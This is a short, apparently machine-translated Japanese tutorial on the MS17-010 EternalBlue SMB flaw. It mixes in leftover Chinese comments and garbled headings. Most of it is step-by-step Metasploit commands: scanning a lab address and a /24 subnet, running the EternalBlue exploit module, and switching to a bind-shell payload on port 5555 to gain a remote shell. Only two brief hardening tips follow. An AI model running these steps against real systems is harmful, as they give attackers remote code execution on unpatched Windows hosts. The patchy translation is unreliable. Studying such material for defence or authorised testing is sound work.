脆弱性の説明
攻撃者は、特別に設計されたメッセージをMicrosoftサーバーメッセージブロックSMBサーバーに送信します。最も深刻な脆弱性により、リモートでコードが実行される可能性があります。
インパクトバージョン
- Windows Vista
- Windows 7
- Windows 8.1
- Windows RT 8.1
- ウィンドウズ10
- Windows Server 2008 和 Windows Server 2008 R2
- Windows Server 2012 和 Windows Server 2012 R2
- Windows Server2016
…
脆弱性の検出
時間
#启动msf
msfconsole
search ms17-010
use auxiliary/scanner/smb/smb_ms17_010
#设置目标ip
set rhosts 192.168.234.132
run
ヒントのHost is likely VULNERABLE to MS17-010
脆弱性が存在する
ウィンドウズ
ツールを使用する:https:
//github.com/holmesian/ms17_010_scan
シングルIP検出:
#ms17010scan-h-n-amd64-1.exe -h ip
ms17010scan-h-n-amd64-1.exe -h 192.168.234.132
マルチIPスキャン:
#ms17010scan-h-n-amd64-1.exe -n ip/24
ms17010scan-h-n-amd64-1.exe -n 192.168.234.0/24
エクスプロイト
時間:
#启动msf
msfconsole
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
#设置目标ip
set rhosts 192.168.234.132
run
パブリックネットワークのIPリバウンドシェルはありません
PCしかなく、脆弱性から跳ね返ったシェルを受け入れるパブリックIPがない場合、msf攻撃ペイロードを変更するだけで済みます。
#查看攻击在和
show payloads
#修改攻击载荷为 generic/shell_bind_tcp
set payload 1
#查看配置,我们只需要设置
show options
#设置目标ip
set rhost 192.168.234.134
set lport 5555
run
私の理解では、generic / shell_bind_tcpペイロードは、ターゲットマシンのポート5555を開くことであり、シェルを取得するためにアクティブに接続します。
元のwindows / x64 / Meterpreter / reverse_tcpは、リッスンしているポートに相手をアクティブに接続させるためのものです。
脆弱性の強化
1.オペレーティングシステムのパッチを更新します。
2.オペレーティングシステムの139や445などの冗長ポートをシャットダウンします。